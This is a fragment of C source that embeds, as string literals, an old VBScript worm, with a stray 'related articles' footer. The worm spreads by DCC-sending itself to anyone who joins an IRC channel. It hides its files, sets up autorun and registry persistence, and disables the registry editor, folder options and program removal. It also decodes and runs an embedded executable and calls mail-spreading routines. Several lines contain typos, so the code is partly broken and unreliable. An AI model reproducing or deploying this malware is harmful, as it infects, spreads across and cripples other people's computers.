    char *k="cc.writeline \\"prompt $P$G$$$_*tthacker@eyou.com*\\"\\ncc.writeline \\"echo on\\"\\ncc.close\\nset at=fso.getfile(dir1&\\"\\\\Run.bat\\")\\nat.attributes=at.attributes+2\\n";
    char *l="set sii=fso.createtextfile(dir2&\\"\\\\event.ini\\")\\nsii.writeline \\"[Levels]\\"\\nsii.writeline \\"Enabled=1\\"\\nsii.writeline \\"Count=6\\"\\nsii.writeline \\"Level1=000-Unknowns\\"\\nsii.writeline \\"000-UnknownsEnabled=1\\"\\n";
    char *mm="sii.writeline \\"Level2=100-Level 100\\"\\nsii.writeline \\"100-Level 100Enabled=1\\"\\nsii.writeline \\"Level3=200-Level 200\\"\\nsii.writeline \\"200-Level 200Enabled=1\\"\\n";
    char *nn="sii.writeline \\"Level4=300-Level 300\\"\\nsii.writeline \\"300-Level 300Enabled=1\\"\\nsii.writeline \\"Level5=400-Level 400\\"\\nsii.writeline \\"400-Level 400Enabled=1\\"\\n";
    char *oo="sii.writeline \\"Level6=500-Level 500\\"\\nsii.writeline \\"500-Level 500Enabled=1\\"\\nsii.writeline \\"\\"\\n";
    char *pp="sii.writeline \\"[000-Unknowns]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\nsii.writeline \\"\\"\\n";
    char *qq="sii.writeline \\"[100-Level 100]\\"\\nsii.writeline \\"User1=*!*@*\\"\\nsii.writeline \\"UserCount=1\\"\\nsii.writeline \\"Event1=ON JOIN:#:/dcc tsend $nick \\" & fso.getspecialfolder(1) & \\"\\\\system.vbe\\"\\nsii.writeline \\"EventCount=1\\"\\n";
    char *rr="sii.writeline \\"\\"\\nsii.writeline \\"[200-Level 200]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\nsii.writeline \\"\\"\\n";
    char *ss="sii.writeline \\"[300-Level 300]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\nsii.writeline \\"\\"\\nsii.writeline \\"[400-Level 400]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\n";
    char *tt="sii.writeline \\"\\"\\nsii.writeline \\"[500-Level 500]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\nsii.close\\nset wi=fso.getfile(dir2&\\"\\\\event.ini\\")\\nwi.attributes=attributes+2\\n";
    char *uu="set rei=fso.createtextfile(dir1&\\"\\\\check.vbe\\")\\nrei.writeline \\"on error resume next\\"\\nrei.writeline \\"dim bb,aa,cc\\"\\nrei.writeline \\"set cc=createobject(\\"\\"wscript.shell\\"\\")\\"\\n";
    char *vv="rei.writeline \\"aa=minute(time)\\"\\nrei.writeline \\"bb=aa\\"\\nrei.writeline \\"do\\"\\nwei.writeline \\"bb=minute(time)\\"\\nrei.writeline \\"loop until aa>=bb+1\\"\\nrei.writeline \\"cc.run \\"\\"system.vbe\\"\\"\\"\\nrei.close\\n";
    char *ww="a.run \\"check.vbe\\"\\nset ahd=fso.getfile(dir1&\\"\\\\check.vbe\\")\\nahd.attributes=attributes+2\\nset ah=fso.getfile(dir2&\\"\\wscript.exe\\")\\nah.attributes=attritutes+2\\n";
    char *xx="set bh=fso.getfile(dir2&\\"\\\\cscript.exe\\")\\nbh.attributes=attributes+2\\nset apq=fso.createtextfile(dir2&\\"\\system.inf\\")\\napq.writeline \\"[Autorun]\\"\\napq.writeline \\"open=system.vbs\\"\\napq.close\\n";
    char *yy="set pr=fso.getfile(dir2&\\"\\\\system.inf\\")\\npr.attributes=attributes+2\\nkill()\\nregruns()\\nlistadriv()\\njuyu()\\nmail()\\n";
    char *kill1="sub kill()\\nset fso=createobject(\\"scripting.filesystemobject\\")\\nset aa=createobject(\\"wscript.shell\\")\\nbb = \\"";
    char *kill2="vv = they(bb)\\nset tt=fso.createtextfile(fso.getspecialfolder(0) & \\"\\\\rav.exe\\",true)\\ntt.write vv\\ntt.close\\naa.run fso.getspecialfolder(0) & \\"\\\\rav.exe\\",1,false\\ntehy(our)\\nend sub\\n";
    char *kill3="Function they(our)\\nFor mine=1 To Len(our) Step 2\\nthey = they & Chr(\\"&h\\" & Mid(our,mine, 2))\\nNext\\nEnd Function\\n";
    char *reg1="sub regruns()\\non error resume next\\nset a=createobject(\\"wscript.shell\\")\\nkj=\\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\\\"\\nki=\\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\\\"\\n";
    char *reg2="a.regwrite kj&\\"Internet Settings\\\\NoNetAutodial\\",01,\\"REG_BINARY\\"\\na.run \\"RUNDLL32.exe shell32,dll,SHExitWindowsEx2\\"\\na.run \\"ping -1 6500 -t ";
    char *reg3="a.regwrite kj&\\"Policies\\\\System\\\\DisableRegistryTools\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
    char *reg4="a.regwrite kj&\\"Policies\\\\Explorer\\\\NoFolderOptions\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
    char *reg5="a.regwrite kj&\\"Policies\\\\Uninstall\\\\NoAddFromCDorFloppy\\"\\"00000001\\",\\"DWORD\\"\\n";
    char *reg6="a.regwrite kj&\\"Policies\\\\Uninstall\\NoAddRemovePrograms\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
    char *reg7="a.regwrite kj&\\"Policies\\\\Uninstall\\NoAddRemovePage\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
    char *reg8="a.regwrite kj&\\"Policies\\\\Explorer\\\\Advanced\\\\folder\\\\Hidden\\\\SHOWALL\\\\checkedValue\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
    char *reg9="a.regwrite \\"HKLM\\\\Software\\\\CLASSES\\\\.reg\\",\\"txtfile\\"\\n";
    char *reg10="a.regwrite \\"HKLM\\\\Software\\\\Microsoft\\\\Command Processor\\\\AutoRun\\",\\"%systemroot%\\\\run.bat&system32.vbe\\",\\"REG_SZ\\"\\n";
    char *reg11="a.retwrite \\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\system\\",dir1&\\"\\\\windows.vbe\\"\\nend sub\\n";

4
相关文章